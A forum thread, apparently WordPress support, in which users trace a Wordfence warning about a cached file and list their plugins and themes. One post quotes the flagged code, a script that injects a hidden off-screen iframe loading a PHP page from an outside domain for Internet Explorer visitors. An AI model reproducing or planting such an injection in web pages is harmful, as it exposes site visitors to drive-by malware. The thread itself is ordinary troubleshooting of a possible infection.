WayneWex

EDIT: You beat me to it, haha.

Gennady, I think I know what might be happening here. The cached file seems to be a newsfeed of some sort? In the code, you can see a link to an article (along with its summary) that is talking about the exploit:

<pre class="brush: xml; light: true; title: ; notranslate">
<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="https://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>');}/*]]>*/</script>
</pre>

I think that WordFence is seeing the quoted code and giving a false positive, maybe?

My other website, which is on the same server, has the following plugins:

• Facebook Comments
• Simple Share Buttons Adder
• W3 Total Cache
• Wordfence Security
• WordPress SEO
• WP Multibyte Patch (Deativated)
• WP Tab Widget

Like my other site above, a WordFence scan showed the same “https://203koko.eu” crap in a cache file. This site uses the theme Point.

I have never used FancyBox before.

My plugins:

• Awesome Weather Widget
• ByREV WP-PICShield – HOTLINK Defence
• Captcha
• Contact Form 7
• Cookie Law Info (Deactivated)
• Easy Digital Downloads (Deactivated)
• Facebook Comments
• Google News Sitemap
• Quick Page/Post Redirect Plugin
• Really Simple CAPTCHA
• Regenerate Thumbnails
• Simple Page Ordering
• Simple Share Buttons Adder
• SlickQuiz
• StarBox (Deactivated)
• W3 Total Cache
• Wordfence Security
• WordPress SEO
• WP Google Maps
• WP Google Maps – Pro Add-on
• WP Job Manager
• WP Multibyte Patch (Deactivated)

The theme that I am using is called Hueman.

@gennady

I just found something similar. Also have WTC as a plugin on both affected sites. Will send the file over now.